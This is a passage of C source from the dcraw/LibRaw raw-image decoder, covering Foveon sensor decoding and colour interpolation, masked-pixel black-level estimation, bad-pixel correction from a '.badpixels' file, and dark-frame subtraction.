memset (pred, 0, sizeof pred);
if (!bit) get4();
for (bit=col=0; col < thumb_width; col++)
FORC3 {
for (dindex=first_decode; dindex->branch[0]; ) {
if ((bit = (bit-1) & 31) == 31)
for (i=0; i < 4; i++)
bitbuf = (bitbuf << 8) + fgetc(ifp);
dindex = dindex->branch[bitbuf >> bit & 1];
}
pred[c] += dindex->leaf;
fputc (pred[c], ofp);
}
}
}
void CLASS foveon_sd_load_raw()
{
#ifdef LIBRAW_LIBRARY_BUILD
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
struct decode *dindex;
short diff[1024];
unsigned bitbuf=0;
int pred[3], row, col, bit=-1, c, i;
read_shorts ((ushort *) diff, 1024);
if (!load_flags) foveon_decoder (1024, 0);
for (row=0; row < height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
memset (pred, 0, sizeof pred);
if (!bit && !load_flags && atoi(model+2) < 14) get4();
for (col=bit=0; col < width; col++) {
if (load_flags) {
bitbuf = get4();
FORC3 pred[2-c] += diff[bitbuf >> c*10 & 0x3ff];
}
else FORC3 {
for (dindex=first_decode; dindex->branch[0]; ) {
if ((bit = (bit-1) & 31) == 31)
for (i=0; i < 4; i++)
bitbuf = (bitbuf << 8) + fgetc(ifp);
dindex = dindex->branch[bitbuf >> bit & 1];
}
pred[c] += diff[dindex->leaf];
if (pred[c] >> 16 && ~pred[c] >> 16) derror();
}
FORC3 image[row*width+col][c] = pred[c];
}
}
}
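/* foveon_huff() fills an 8-bit-indexed Huffman lookup table for ljpeg_diff():
   each of 13 (length, code) pairs expands into 256 >> length entries packing
   the code length in the high byte and the symbol in the low byte; huff[0]
   holds the peek width (8 bits). */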
void CLASS foveon_huff (ushort *huff)
{
int i, j, clen, code;
huff[0] = 8;
for (i=0; i < 13; i++) {
clen = getc(ifp);
code = getc(ifp);
for (j=0; j < 256 >> clen; )
huff[code+ ++j] = clen << 8 | i;
}
get2();
}
void CLASS foveon_dp_load_raw()
{
#ifdef LIBRAW_LIBRARY_BUILD
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
unsigned c, roff[4], row, col, diff;
ushort huff[512], vpred[2][2], hpred[2];
fseek (ifp, 8, SEEK_CUR);
foveon_huff (huff);
roff[0] = 48;
FORC3 roff[c+1] = -(-(roff[c] + get4()) & -16);
FORC3 {
fseek (ifp, data_offset+roff[c], SEEK_SET);
getbits(-1);
vpred[0][0] = vpred[0][1] = vpred[1][0] = vpred[1][1] = 512;
for (row=0; row < height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < width; col++) {
diff = ljpeg_diff(huff);
if (col < 2) hpred[col] = vpred[row & 1][col] += diff;
else hpred[col & 1] += diff;
image[row*width+col][c] = hpred[col & 1];
}
}
}
}
void CLASS foveon_load_camf()
{
unsigned type, wide, high, i, j, row, col, diff;
ushort huff[258], vpred[2][2] = {{512,512},{512,512}}, hpred[2];
fseek (ifp, meta_offset, SEEK_SET);
type = get4(); get4(); get4();
wide = get4();
high = get4();
if (type == 2) {
fread (meta_data, 1, meta_length, ifp);
for (i=0; i < meta_length; i++) {
high = (high * 1597 + 51749) % 244944;
wide = high * (INT64) 301593171 >> 24;
meta_data[i] ^= ((((high << 8) - wide) >> 1) + wide) >> 17;
}
} else if (type == 4) {
free (meta_data);
meta_data = (char *) malloc (meta_length = wide*high*3/2);
merror (meta_data, "foveon_load_camf()");
foveon_huff (huff);
get4();
getbits(-1);
for (j=row=0; row < high; row++) {
for (col=0; col < wide; col++) {
diff = ljpeg_diff(huff);
if (col < 2) hpred[col] = vpred[row & 1][col] += diff;
else hpred[col & 1] += diff;
if (col & 1) {
meta_data[j++] = hpred[0] >> 4;
meta_data[j++] = hpred[0] << 4 | hpred[1] >> 8;
meta_data[j++] = hpred[1];
}
}
}
}
#ifdef DCRAW_VERBOSE
else
fprintf (stderr,_("%s has unknown CAMF type %d.\n"), ifname, type);
#endif
}
const char * CLASS foveon_camf_param (const char *block, const char *param)
{
unsigned idx, num;
char *pos, *cp, *dp;
for (idx=0; idx < meta_length; idx += sget4(pos+8)) {
pos = meta_data + idx;
if (strncmp (pos, "CMb", 3)) break;
if (pos[3] != 'P') continue;
if (strcmp (block, pos+sget4(pos+12))) continue;
cp = pos + sget4(pos+16);
num = sget4(cp);
dp = pos + sget4(cp+4);
while (num--) {
cp += 8;
if (!strcmp (param, dp+sget4(cp)))
return dp+sget4(cp+4);
}
}
return 0;
}
void * CLASS foveon_camf_matrix (unsigned dim[3], const char *name)
{
unsigned i, idx, type, ndim, size, *mat;
char *pos, *cp, *dp;
double dsize;
for (idx=0; idx < meta_length; idx += sget4(pos+8)) {
pos = meta_data + idx;
if (strncmp (pos, "CMb", 3)) break;
if (pos[3] != 'M') continue;
if (strcmp (name, pos+sget4(pos+12))) continue;
dim[0] = dim[1] = dim[2] = 1;
cp = pos + sget4(pos+16);
type = sget4(cp);
if ((ndim = sget4(cp+4)) > 3) break;
dp = pos + sget4(cp+8);
for (i=ndim; i--; ) {
cp += 12;
dim[i] = sget4(cp);
}
if ((dsize = (double) dim[0]*dim[1]*dim[2]) > meta_length/4) break;
mat = (unsigned *) malloc ((size = dsize) * 4);
merror (mat, "foveon_camf_matrix()");
for (i=0; i < size; i++)
if (type && type != 6)
mat[i] = sget4(dp + i*4);
else
mat[i] = sget4(dp + i*2) & 0xffff;
return mat;
}
#ifdef DCRAW_VERBOSE
fprintf (stderr,_("%s: \"%s\" matrix not found!\n"), ifname, name);
#endif
return 0;
}
int CLASS foveon_fixed (void *ptr, int size, const char *name)
{
void *dp;
unsigned dim[3];
if (!name) return 0;
dp = foveon_camf_matrix (dim, name);
if (!dp) return 0;
memcpy (ptr, dp, size*4);
free (dp);
return 1;
}
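/* foveon_avg(): trimmed mean of a run of dark-shield samples with the
   column-filter correction applied; the minimum and maximum are discarded
   unless the range covers only two samples. */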
float CLASS foveon_avg (short *pix, int range[2], float cfilt)
{
int i;
float val, min=FLT_MAX, max=-FLT_MAX, sum=0;
for (i=range[0]; i <= range[1]; i++) {
sum += val = pix[i*4] + (pix[i*4]-pix[(i-1)*4]) * cfilt;
if (min > val) min = val;
if (max < val) max = val;
}
if (range[1] - range[0] == 1) return sum/2;
return (sum - min - max) / (range[1] - range[0] - 1);
}
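/* foveon_make_curve() builds a soft-clipping lookup table: a tanh limiter
   scaled by mul and windowed by a raised cosine. curve[0] stores the table
   length; the entries follow from index 1. */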
short * CLASS foveon_make_curve (double max, double mul, double filt)
{
short *curve;
unsigned i, size;
double x;
if (!filt) filt = 0.8;
size = 4*M_PI*max / filt;
if (size == UINT_MAX) size--;
curve = (short *) calloc (size+1, sizeof *curve);
merror (curve, "foveon_make_curve()");
curve[0] = size;
for (i=0; i < size; i++) {
x = i*filt/max/4;
curve[i+1] = (cos(x)+1)/2 * tanh(i*filt/mul) * mul + 0.5;
}
return curve;
}
void CLASS foveon_make_curves
(short **curvep, float dq[3], float div[3], float filt)
{
double mul[3], max=0;
int c;
FORC3 mul[c] = dq[c]/div[c];
FORC3 if (max < mul[c]) max = mul[c];
FORC3 curvep[c] = foveon_make_curve (max, mul[c], filt);
}
int CLASS foveon_apply_curve (short *curve, int i)
{
if (abs(i) >= curve[0]) return 0;
return i < 0 ? -curve[1-i] : curve[1+i];
}
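/* Rough outline of foveon_interpolate(): read the CAMF calibration data,
   estimate and subtract dark drift and per-row black, apply spatial gain and
   the polynomial color matrix, patch listed bad pixels, sharpen red against a
   5x5 Gaussian average, restore highlight linearity, smooth hues while
   preserving R+G+B, transform to the working colorspace, smooth chroma via a
   1/4-scale copy of the image, and finally trim the black border. */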
#define image ((short (*)[4]) image)
void CLASS foveon_interpolate()
{
static const short hood[] = { -1,-1, -1,0, -1,1, 0,-1, 0,1, 1,-1, 1,0, 1,1 };
short *pix, prev[3], *curve[8], (*shrink)[3];
float cfilt=0, ddft[3][3][2], ppm[3][3][3];
float cam_xyz[3][3], correct[3][3], last[3][3], trans[3][3];
float chroma_dq[3], color_dq[3], diag[3][3], div[3];
float (*black)[3], (*sgain)[3], (*sgrow)[3];
float fsum[3], val, frow, num;
int row, col, c, i, j, diff, sgx, irow, sum, min, max, limit;
int dscr[2][2], dstb[4], (*smrow[7])[3], total[4], ipix[3];
int work[3][3], smlast, smred, smred_p=0, dev[3];
int satlev[3], keep[4], active[4];
unsigned dim[3], *badpix;
double dsum=0, trsum[3];
char str[128];
const char* cp;
#ifdef DCRAW_VERBOSE
if (verbose)
fprintf (stderr,_("Foveon interpolation...\n"));
#endif
foveon_load_camf();
foveon_fixed (dscr, 4, "DarkShieldColRange");
foveon_fixed (ppm[0][0], 27, "PostPolyMatrix");
foveon_fixed (satlev, 3, "SaturationLevel");
foveon_fixed (keep, 4, "KeepImageArea");
foveon_fixed (active, 4, "ActiveImageArea");
foveon_fixed (chroma_dq, 3, "ChromaDQ");
foveon_fixed (color_dq, 3,
foveon_camf_param ("IncludeBlocks", "ColorDQ") ?
"ColorDQ" : "ColorDQCamRGB");
if (foveon_camf_param ("IncludeBlocks", "ColumnFilter"))
foveon_fixed (&cfilt, 1, "ColumnFilter");
memset (ddft, 0, sizeof ddft);
if (!foveon_camf_param ("IncludeBlocks", "DarkDrift")
|| !foveon_fixed (ddft[1][0], 12, "DarkDrift"))
for (i=0; i < 2; i++) {
foveon_fixed (dstb, 4, i ? "DarkShieldBottom":"DarkShieldTop");
for (row = dstb[1]; row <= dstb[3]; row++)
for (col = dstb[0]; col <= dstb[2]; col++)
FORC3 ddft[i+1][c][1] += (short) image[row*width+col][c];
FORC3 ddft[i+1][c][1] /= (dstb[3]-dstb[1]+1) * (dstb[2]-dstb[0]+1);
}
if (!(cp = foveon_camf_param ("WhiteBalanceIlluminants", model2)))
{
#ifdef DCRAW_VERBOSE
fprintf (stderr,_("%s: Invalid white balance \"%s\"\n"), ifname, model2);
#endif
return; }
foveon_fixed (cam_xyz, 9, cp);
foveon_fixed (correct, 9,
foveon_camf_param ("WhiteBalanceCorrections", model2));
memset (last, 0, sizeof last);
for (i=0; i < 3; i++)
for (j=0; j < 3; j++)
FORC3 last[i][j] += correct[i][c] * cam_xyz[c][j];
#define LAST(x,y) last[(i+x)%3][(c+y)%3]
for (i=0; i < 3; i++)
FORC3 diag[c][i] = LAST(1,1)*LAST(2,2) - LAST(1,2)*LAST(2,1);
#undef LAST
FORC3 div[c] = diag[c][0]*0.3127 + diag[c][1]*0.329 + diag[c][2]*0.3583;
sprintf (str, "%sRGBNeutral", model2);
if (foveon_camf_param ("IncludeBlocks", str))
foveon_fixed (div, 3, str);
num = 0;
FORC3 if (num < div[c]) num = div[c];
FORC3 div[c] /= num;
memset (trans, 0, sizeof trans);
for (i=0; i < 3; i++)
for (j=0; j < 3; j++)
FORC3 trans[i][j] += rgb_cam[i][c] * last[c][j] * div[j];
FORC3 trsum[c] = trans[c][0] + trans[c][1] + trans[c][2];
dsum = (6*trsum[0] + 11*trsum[1] + 3*trsum[2]) / 20;
for (i=0; i < 3; i++)
FORC3 last[i][c] = trans[i][c] * dsum / trsum[i];
memset (trans, 0, sizeof trans);
for (i=0; i < 3; i++)
for (j=0; j < 3; j++)
FORC3 trans[i][j] += (i==c ? 32 : -1) * last[c][j] / 30;
foveon_make_curves (curve, color_dq, div, cfilt);
FORC3 chroma_dq[c] /= 3;
foveon_make_curves (curve+3, chroma_dq, div, cfilt);
FORC3 dsum += chroma_dq[c] / div[c];
curve[6] = foveon_make_curve (dsum, dsum, cfilt);
curve[7] = foveon_make_curve (dsum*2, dsum*2, cfilt);
sgain = (float (*)[3]) foveon_camf_matrix (dim, "SpatialGain");
if (!sgain) return;
sgrow = (float (*)[3]) calloc (dim[1], sizeof *sgrow);
sgx = (width + dim[1]-2) / (dim[1]-1);
black = (float (*)[3]) calloc (height, sizeof *black);
for (row=0; row < height; row++) {
for (i=0; i < 6; i++)
((float *)ddft[0])[i] = ((float *)ddft[1])[i] +
row / (height-1.0) * (((float *)ddft[2])[i] - ((float *)ddft[1])[i]);
FORC3 black[row][c] =
( foveon_avg (image[row*width]+c, dscr[0], cfilt) +
foveon_avg (image[row*width]+c, dscr[1], cfilt) * 3
- ddft[0][c][0] ) / 4 - ddft[0][c][1];
}
memcpy (black, black+8, sizeof *black*8);
memcpy (black+height-11, black+height-22, 11*sizeof *black);
memcpy (last, black, sizeof last);
for (row=1; row < height-1; row++) {
FORC3 if (last[1][c] > last[0][c]) {
if (last[1][c] > last[2][c])
black[row][c] = (last[0][c] > last[2][c]) ? last[0][c]:last[2][c];
} else
if (last[1][c] < last[2][c])
black[row][c] = (last[0][c] < last[2][c]) ? last[0][c]:last[2][c];
memmove (last, last+1, 2*sizeof last[0]);
memcpy (last[2], black[row+1], sizeof last[2]);
}
FORC3 black[row][c] = (last[0][c] + last[1][c])/2;
FORC3 black[0][c] = (black[1][c] + black[3][c])/2;
val = 1 - exp(-1/24.0);
memcpy (fsum, black, sizeof fsum);
for (row=1; row < height; row++)
FORC3 fsum[c] += black[row][c] =
(black[row][c] - black[row-1][c])*val + black[row-1][c];
memcpy (last[0], black[height-1], sizeof last[0]);
FORC3 fsum[c] /= height;
for (row = height; row--; )
FORC3 last[0][c] = black[row][c] =
(black[row][c] - fsum[c] - last[0][c])*val + last[0][c];
memset (total, 0, sizeof total);
for (row=2; row < height; row+=4)
for (col=2; col < width; col+=4) {
FORC3 total[c] += (short) image[row*width+col][c];
total[3]++;
}
for (row=0; row < height; row++)
FORC3 black[row][c] += fsum[c]/2 + total[c]/(total[3]*100.0);
for (row=0; row < height; row++) {
for (i=0; i < 6; i++)
((float *)ddft[0])[i] = ((float *)ddft[1])[i] +
row / (height-1.0) * (((float *)ddft[2])[i] - ((float *)ddft[1])[i]);
pix = image[row*width];
memcpy (prev, pix, sizeof prev);
frow = row / (height-1.0) * (dim[2]-1);
if ((irow = frow) == dim[2]-1) irow--;
frow -= irow;
for (i=0; i < dim[1]; i++)
FORC3 sgrow[i][c] = sgain[ irow *dim[1]+i][c] * (1-frow) +
sgain[(irow+1)*dim[1]+i][c] * frow;
for (col=0; col < width; col++) {
FORC3 {
diff = pix[c] - prev[c];
prev[c] = pix[c];
ipix[c] = pix[c] + floor ((diff + (diff*diff >> 14)) * cfilt
- ddft[0][c][1] - ddft[0][c][0] * ((float) col/width - 0.5)
- black[row][c] );
}
FORC3 {
work[0][c] = ipix[c] * ipix[c] >> 14;
work[2][c] = ipix[c] * work[0][c] >> 14;
work[1][2-c] = ipix[(c+1) % 3] * ipix[(c+2) % 3] >> 14;
}
FORC3 {
for (val=i=0; i < 3; i++)
for ( j=0; j < 3; j++)
val += ppm[c][i][j] * work[i][j];
ipix[c] = floor ((ipix[c] + floor(val)) *
( sgrow[col/sgx ][c] * (sgx - col%sgx) +
sgrow[col/sgx+1][c] * (col%sgx) ) / sgx / div[c]);
if (ipix[c] > 32000) ipix[c] = 32000;
pix[c] = ipix[c];
}
pix += 4;
}
}
free (black);
free (sgrow);
free (sgain);
if ((badpix = (unsigned *) foveon_camf_matrix (dim, "BadPixels"))) {
for (i=0; i < dim[0]; i++) {
col = (badpix[i] >> 8 & 0xfff) - keep[0];
row = (badpix[i] >> 20 ) - keep[1];
if ((unsigned)(row-1) > height-3 || (unsigned)(col-1) > width-3)
continue;
memset (fsum, 0, sizeof fsum);
for (sum=j=0; j < 8; j++)
if (badpix[i] & (1 << j)) {
FORC3 fsum[c] += (short)
image[(row+hood[j*2])*width+col+hood[j*2+1]][c];
sum++;
}
if (sum) FORC3 image[row*width+col][c] = fsum[c]/sum;
}
free (badpix);
}
/* Array for 5x5 Gaussian averaging of red values */
smrow[6] = (int (*)[3]) calloc (width*5, sizeof **smrow);
merror (smrow[6], "foveon_interpolate()");
for (i=0; i < 5; i++)
smrow[i] = smrow[6] + i*width;
/* Sharpen the reds against these Gaussian averages */
for (smlast=-1, row=2; row < height-2; row++) {
while (smlast < row+2) {
for (i=0; i < 6; i++)
smrow[(i+5) % 6] = smrow[i];
pix = image[++smlast*width+2];
for (col=2; col < width-2; col++) {
smrow[4][col][0] =
(pix[0]*6 + (pix[-4]+pix[4])*4 + pix[-8]+pix[8] + 8) >> 4;
pix += 4;
}
}
pix = image[row*width+2];
for (col=2; col < width-2; col++) {
smred = ( 6 * smrow[2][col][0]
+ 4 * (smrow[1][col][0] + smrow[3][col][0])
+ smrow[0][col][0] + smrow[4][col][0] + 8 ) >> 4;
if (col == 2)
smred_p = smred;
i = pix[0] + ((pix[0] - ((smred*7 + smred_p) >> 3)) >> 3);
if (i > 32000) i = 32000;
pix[0] = i;
smred_p = smred;
pix += 4;
}
}
/* Adjust the brighter pixels for better linearity */
min = 0xffff;
FORC3 {
i = satlev[c] / div[c];
if (min > i) min = i;
}
limit = min * 9 >> 4;
for (pix=image[0]; pix < image[height*width]; pix+=4) {
if (pix[0] <= limit || pix[1] <= limit || pix[2] <= limit)
continue;
min = max = pix[0];
for (c=1; c < 3; c++) {
if (min > pix[c]) min = pix[c];
if (max < pix[c]) max = pix[c];
}
if (min >= limit*2) {
pix[0] = pix[1] = pix[2] = max;
} else {
i = 0x4000 - ((min - limit) << 14) / limit;
i = 0x4000 - (i*i >> 14);
i = i*i >> 14;
FORC3 pix[c] += (max - pix[c]) * i >> 14;
}
}
/*
Because photons that miss one detector often hit another,
the sum R+G+B is much less noisy than the individual colors.
So smooth the hues without smoothing the total.
*/
for (smlast=-1, row=2; row < height-2; row++) {
while (smlast < row+2) {
for (i=0; i < 6; i++)
smrow[(i+5) % 6] = smrow[i];
pix = image[++smlast*width+2];
for (col=2; col < width-2; col++) {
FORC3 smrow[4][col][c] = (pix[c-4]+2*pix[c]+pix[c+4]+2) >> 2;
pix += 4;
}
}
pix = image[row*width+2];
for (col=2; col < width-2; col++) {
FORC3 dev[c] = -foveon_apply_curve (curve[7], pix[c] -
((smrow[1][col][c] + 2*smrow[2][col][c] + smrow[3][col][c]) >> 2));
sum = (dev[0] + dev[1] + dev[2]) >> 3;
FORC3 pix[c] += dev[c] - sum;
pix += 4;
}
}
for (smlast=-1, row=2; row < height-2; row++) {
while (smlast < row+2) {
for (i=0; i < 6; i++)
smrow[(i+5) % 6] = smrow[i];
pix = image[++smlast*width+2];
for (col=2; col < width-2; col++) {
FORC3 smrow[4][col][c] =
(pix[c-8]+pix[c-4]+pix[c]+pix[c+4]+pix[c+8]+2) >> 2;
pix += 4;
}
}
pix = image[row*width+2];
for (col=2; col < width-2; col++) {
for (total[3]=375, sum=60, c=0; c < 3; c++) {
for (total[c]=i=0; i < 5; i++)
total[c] += smrow[i][col][c];
total[3] += total[c];
sum += pix[c];
}
if (sum < 0) sum = 0;
j = total[3] > 375 ? (sum << 16) / total[3] : sum * 174;
FORC3 pix[c] += foveon_apply_curve (curve[6],
((j*total[c] + 0x8000) >> 16) - pix[c]);
pix += 4;
}
}
/* Transform the image to a different colorspace */
for (pix=image[0]; pix < image[height*width]; pix+=4) {
FORC3 pix[c] -= foveon_apply_curve (curve[c], pix[c]);
sum = (pix[0]+pix[1]+pix[1]+pix[2]) >> 2;
FORC3 pix[c] -= foveon_apply_curve (curve[c], pix[c]-sum);
FORC3 {
for (dsum=i=0; i < 3; i++)
dsum += trans[c][i] * pix[i];
if (dsum < 0) dsum = 0;
if (dsum > 24000) dsum = 24000;
ipix[c] = dsum + 0.5;
}
FORC3 pix[c] = ipix[c];
}
/* Smooth the image bottom-to-top and save at 1/4 scale */
shrink = (short (*)[3]) calloc ((height/4), (width/4)*sizeof *shrink);
merror (shrink, "foveon_interpolate()");
for (row = height/4; row--; )
for (col=0; col < width/4; col++) {
ipix[0] = ipix[1] = ipix[2] = 0;
for (i=0; i < 4; i++)
for (j=0; j < 4; j++)
FORC3 ipix[c] += image[(row*4+i)*width+col*4+j][c];
FORC3
if (row+2 > height/4)
shrink[row*(width/4)+col][c] = ipix[c] >> 4;
else
shrink[row*(width/4)+col][c] =
(shrink[(row+1)*(width/4)+col][c]*1840 + ipix[c]*141 + 2048) >> 12;
}
/* From the 1/4-scale image, smooth right-to-left */
for (row=0; row < (height & ~3); row++) {
ipix[0] = ipix[1] = ipix[2] = 0;
if ((row & 3) == 0)
for (col = width & ~3 ; col--; )
FORC3 smrow[0][col][c] = ipix[c] =
(shrink[(row/4)*(width/4)+col/4][c]*1485 + ipix[c]*6707 + 4096) >> 13;
/* Then smooth left-to-right */
ipix[0] = ipix[1] = ipix[2] = 0;
for (col=0; col < (width & ~3); col++)
FORC3 smrow[1][col][c] = ipix[c] =
(smrow[0][col][c]*1485 + ipix[c]*6707 + 4096) >> 13;
/* Smooth top-to-bottom */
if (row == 0)
memcpy (smrow[2], smrow[1], sizeof **smrow * width);
else
for (col=0; col < (width & ~3); col++)
FORC3 smrow[2][col][c] =
(smrow[2][col][c]*6707 + smrow[1][col][c]*1485 + 4096) >> 13;
/* Adjust the chroma toward the smooth values */
for (col=0; col < (width & ~3); col++) {
for (i=j=30, c=0; c < 3; c++) {
i += smrow[2][col][c];
j += image[row*width+col][c];
}
j = (j << 16) / i;
for (sum=c=0; c < 3; c++) {
ipix[c] = foveon_apply_curve (curve[c+3],
((smrow[2][col][c] * j + 0x8000) >> 16) - image[row*width+col][c]);
sum += ipix[c];
}
sum >>= 3;
FORC3 {
i = image[row*width+col][c] + ipix[c] - sum;
if (i < 0) i = 0;
image[row*width+col][c] = i;
}
}
}
free (shrink);
free (smrow[6]);
for (i=0; i < 8; i++)
free (curve[i]);
/* Trim off the black border */
active[1] -= keep[1];
active[3] -= 2;
i = active[2] - active[0];
for (row=0; row < active[3]-active[1]; row++)
memcpy (image[row*i], image[(row+active[1])*width+active[0]],
i * sizeof *image);
width = i;
height = row;
}
#undef image
/* RESTRICTED code ends here */
//@out COMMON
void CLASS crop_masked_pixels()
{
int row, col;
unsigned
#ifndef LIBRAW_LIBRARY_BUILD
r, raw_pitch = raw_width*2,
c, m, mblack[8], zero, val;
#else
c, m, zero, val;
#define mblack imgdata.color.black_stat
#endif
#ifndef LIBRAW_LIBRARY_BUILD
if (load_raw == &CLASS phase_one_load_raw ||
load_raw == &CLASS phase_one_load_raw_c)
phase_one_correct();
if (fuji_width) {
for (row=0; row < raw_height-top_margin*2; row++) {
for (col=0; col < fuji_width << !fuji_layout; col++) {
if (fuji_layout) {
r = fuji_width - 1 - col + (row >> 1);
c = col + ((row+1) >> 1);
} else {
r = fuji_width - 1 + row - (col >> 1);
c = row + ((col+1) >> 1);
}
if (r < height && c < width)
BAYER(r,c) = RAW(row+top_margin,col+left_margin);
}
}
} else {
for (row=0; row < height; row++)
for (col=0; col < width; col++)
BAYER2(row,col) = RAW(row+top_margin,col+left_margin);
}
#endif
if (mask[0][3] > 0) goto mask_set;
if (load_raw == &CLASS canon_load_raw ||
load_raw == &CLASS lossless_jpeg_load_raw) {
mask[0][1] = mask[1][1] += 2;
mask[0][3] -= 2;
goto sides;
}
if (load_raw == &CLASS canon_600_load_raw ||
load_raw == &CLASS sony_load_raw ||
(load_raw == &CLASS eight_bit_load_raw && strncmp(model,"DC2",3)) ||
load_raw == &CLASS kodak_262_load_raw ||
(load_raw == &CLASS packed_load_raw && (load_flags & 32))) {
sides:
mask[0][0] = mask[1][0] = top_margin;
mask[0][2] = mask[1][2] = top_margin+height;
mask[0][3] += left_margin;
mask[1][1] += left_margin+width;
mask[1][3] += raw_width;
}
if (load_raw == &CLASS nokia_load_raw) {
mask[0][2] = top_margin;
mask[0][3] = width;
}
#ifdef LIBRAW_LIBRARY_BUILD
if (load_raw == &CLASS broadcom_load_raw) {
mask[0][2] = top_margin;
mask[0][3] = width;
}
#endif
mask_set:
memset (mblack, 0, sizeof mblack);
for (zero=m=0; m < 8; m++)
for (row=MAX(mask[m][0],0); row < MIN(mask[m][2],raw_height); row++)
for (col=MAX(mask[m][1],0); col < MIN(mask[m][3],raw_width); col++) {
c = FC(row-top_margin,col-left_margin);
mblack[c] += val = raw_image[(row)*raw_pitch/2+(col)];
mblack[4+c]++;
zero += !val;
}
if (load_raw == &CLASS canon_600_load_raw && width < raw_width) {
black = (mblack[0]+mblack[1]+mblack[2]+mblack[3]) /
(mblack[4]+mblack[5]+mblack[6]+mblack[7]) - 4;
#ifndef LIBRAW_LIBRARY_BUILD
canon_600_correct();
#endif
} else if (zero < mblack[4] && mblack[5] && mblack[6] && mblack[7]) {
FORC4 cblack[c] = mblack[c] / mblack[4+c];
black = cblack[4] = cblack[5] = cblack[6] = 0;
}
}
#ifdef LIBRAW_LIBRARY_BUILD
#undef mblack
#endif
void CLASS remove_zeroes()
{
unsigned row, col, tot, n, r, c;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_REMOVE_ZEROES,0,2);
#endif
for (row=0; row < height; row++)
for (col=0; col < width; col++)
if (BAYER(row,col) == 0) {
tot = n = 0;
for (r = row-2; r <= row+2; r++)
for (c = col-2; c <= col+2; c++)
if (r < height && c < width &&
FC(r,c) == FC(row,col) && BAYER(r,c))
tot += (n++,BAYER(r,c));
if (n) BAYER(row,col) = tot/n;
}
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_REMOVE_ZEROES,1,2);
#endif
}
//@end COMMON
/* @out FILEIO
#include <math.h>
#define CLASS LibRaw::
#include "libraw/libraw_types.h"
#define LIBRAW_LIBRARY_BUILD
#include "libraw/libraw.h"
#include "internal/defines.h"
#include "internal/var_defines.h"
@end FILEIO */
// @out FILEIO
/*
Search from the current directory up to the root looking for
a ".badpixels" file, and fix those pixels now.
*/
void CLASS bad_pixels (const char *cfname)
{
FILE *fp=NULL;
#ifndef LIBRAW_LIBRARY_BUILD
char *fname, *cp, line[128];
int len, time, row, col, r, c, rad, tot, n, fixed=0;
#else
char *cp, line[128];
int time, row, col, r, c, rad, tot, n;
#ifdef DCRAW_VERBOSE
int fixed = 0;
#endif
#endif
if (!filters) return;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_BAD_PIXELS,0,2);
#endif
if (cfname)
fp = fopen (cfname, "r");
// @end FILEIO
else {
for (len=32 ; ; len *= 2) {
fname = (char *) malloc (len);
if (!fname) return;
if (getcwd (fname, len-16)) break;
free (fname);
if (errno != ERANGE) return;
}
#if defined(WIN32) || defined(DJGPP)
if (fname[1] == ':')
memmove (fname, fname+2, len-2);
for (cp=fname; *cp; cp++)
if (*cp == '\\') *cp = '/';
#endif
cp = fname + strlen(fname);
if (cp[-1] == '/') cp--;
while (*fname == '/') {
strcpy (cp, "/.badpixels");
if ((fp = fopen (fname, "r"))) break;
if (cp == fname) break;
while (*--cp != '/');
}
free (fname);
}
// @out FILEIO
if (!fp)
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_NO_BADPIXELMAP;
#endif
return;
}
while (fgets (line, 128, fp)) {
cp = strchr (line, '#');
if (cp) *cp = 0;
if (sscanf (line, "%d %d %d", &col, &row, &time) != 3) continue;
if ((unsigned) col >= width || (unsigned) row >= height) continue;
if (time > timestamp) continue;
for (tot=n=0, rad=1; rad < 3 && n==0; rad++)
for (r = row-rad; r <= row+rad; r++)
for (c = col-rad; c <= col+rad; c++)
if ((unsigned) r < height && (unsigned) c < width &&
(r != row || c != col) && fcol(r,c) == fcol(row,col)) {
tot += BAYER2(r,c);
n++;
}
BAYER2(row,col) = tot/n;
#ifdef DCRAW_VERBOSE
if (verbose) {
if (!fixed++)
fprintf (stderr,_("Fixed dead pixels at:"));
fprintf (stderr, " %d,%d", col, row);
}
#endif
}
#ifdef DCRAW_VERBOSE
if (fixed) fputc ('\n', stderr);
#endif
fclose (fp);
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_BAD_PIXELS,1,2);
#endif
}
void CLASS subtract (const char *fname)
{
FILE *fp;
int dim[3]={0,0,0}, comment=0, number=0, error=0, nd=0, c, row, col;
ushort *pixel;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_DARK_FRAME,0,2);
#endif
if (!(fp = fopen (fname, "rb"))) {
#ifdef DCRAW_VERBOSE
perror (fname);
#endif
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_BAD_DARKFRAME_FILE;
#endif
return;
}
if (fgetc(fp) != 'P' || fgetc(fp) != '5') error = 1;
while (!error && nd < 3 && (c = fgetc(fp)) != EOF) {
if (c == '#') comment = 1;
if (c == '\n') comment = 0;
if (comment) continue;
if (isdigit(c)) number = 1;
if (number) {
if (isdigit(c)) dim[nd] = dim[nd]*10 + c -'0';
else if (isspace(c)) {
number = 0; nd++;
} else error = 1;
}
}
if (error || nd < 3) {
#ifdef DCRAW_VERBOSE
fprintf (stderr,_("%s is not a valid PGM file!\n"), fname);
#endif
fclose (fp); return;
} else if (dim[0] != width || dim[1] != height || dim[2] != 65535) {
#ifdef DCRAW_VERBOSE
fprintf (stderr,_("%s has the wrong dimensions!\n"), fname);
#endif
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_BAD_DARKFRAME_DIM;
#endif
fclose (fp); return;
}
pixel = (ushort *) calloc (width, sizeof *pixel);
merror (pixel, "subtract()");
for (row=0; row < height; row++) {
fread (pixel, 2, width, fp);
for (col=0; col < width; col++)
BAYER(row,col) = MAX (BAYER(row,col) - ntohs(pixel[col]), 0);
}
free (pixel);
fclose (fp);
memset (cblack, 0, sizeof cblack);
black = 0;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_DARK_FRAME,1,2);
#endif
}
//@end FILEIO
//@out COMMON
